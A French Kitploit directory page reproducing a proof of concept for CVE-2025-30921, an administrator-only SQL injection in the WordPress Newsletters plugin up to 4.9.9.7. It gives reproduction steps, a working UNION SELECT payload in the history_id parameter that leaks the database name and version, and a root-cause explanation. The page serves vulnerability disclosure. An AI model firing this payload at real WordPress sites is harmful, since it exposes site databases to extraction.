Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-30921 — PoC of CVE-2025-30921 | Kitploit
Outils/GitHubGitHub/dottak/cve-2025-30921
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubdottak/cve-2025-30921

CVE-2025-30921

PoC of CVE-2025-30921

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-30921

1️⃣ Type de composant

Plugin WordPress

2️⃣ Détails du composant

Component name Newsletters

Vulnerable version <= 4.9.9.7

Component slug newsletters-lite

Component link https://wordpress.org/plugins/newsletters-lite/

3️⃣ OWASP 2017 : TOP 10

Vulnerability class A3 : Injection

Vulnerability type Injection SQL

4️⃣ Prérequis

Administrateur

5️⃣ Détails de la vulnérabilité

👉 Brève description

Lors de la visualisation du graphique d'aperçu des statistiques dans le tableau de bord du plugin (/wp-admin/admin.php?page=newsletters) de la version 4.9.9.7 ou inférieure du plugin Newsletters, une vulnérabilité d'injection SQL se produit en raison d'une validation insuffisante des entrées et d'un traitement d'échappement des paramètres d'URL.

Grâce à cette vulnérabilité, un attaquant disposant de privilèges d'administrateur peut l'exploiter pour extraire des informations de la base de données du site cible.

👉 Comment reproduire (PoC)

  1. Préparez un site WordPress avec la version 4.9.9.7 ou inférieure du plugin Newsletters installé.

  2. Accédez au menu du tableau de bord du plugin Newsletters (/wp-admin/admin.php?page=newsletters).

    image

  3. À l'aide des outils de développement du navigateur, recherchez action=wpmlwelcomestats&security= dans l'onglet « Elements » et vérifiez la valeur de security. Par exemple, si le résultat de la recherche apparaît comme ci-dessous, notez 22b1ac0de6.

    root@kitploit:~
    // ...
    
    jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
    
    // ...
    

    image

  4. Saisissez la valeur de security notée dans la section <SECURITY VALUE> du chemin URL ci-dessous et envoyez une requête à cette URL

    root@kitploit:~
    http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
    

👉 Informations complémentaires (optionnel)

[Cause racine de la vulnérabilité]

Lors de la demande de l'URL où se produit la vulnérabilité d'injection SQL dans le PoC ci-dessus, la fonction ajax_welcomestats dans le fichier /wp-content/plugins/newsletters-lite/wp-mailinglist-plugin.php est appelée.

À ce stade, le paramètre de requête history_id est directement référencé comme clause de condition dans la chaîne de requête SQL et initialisé comme variable $history_condition. Cette variable est ensuite transmise à la requête de base de données sans aucun traitement d'échappement.

image

Par conséquent, comme il n'y a pas de validation ou de traitement d'échappement pour les valeurs saisies dans le paramètre URL history_id, une vulnérabilité d'injection SQL se produit. (Notez que les paramètres URL from et to sont également vulnérables aux attaques par injection SQL en raison d'une validation et d'un traitement d'échappement insuffisants.)

6️⃣ Démonstration de l'exploitation

video

7️⃣ Références

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30921
Télécharger l’outil

Parmi les paramètres de l'URL, history_id contient la charge utile d'injection SQL, ce qui permet d'interroger le nom de la base de données (DATABASE()) et sa version (@@VERSION). Par exemple, lorsque la valeur de security est 22b1ac0de6, accédez à l'URL suivante.

http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=22b1ac0de6&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23

  • En vérifiant la réponse de la requête URL, vous pouvez confirmer que le nom de la base de données et les informations de version sont exposés en raison de la vulnérabilité d'injection SQL via le paramètre history_id.

    image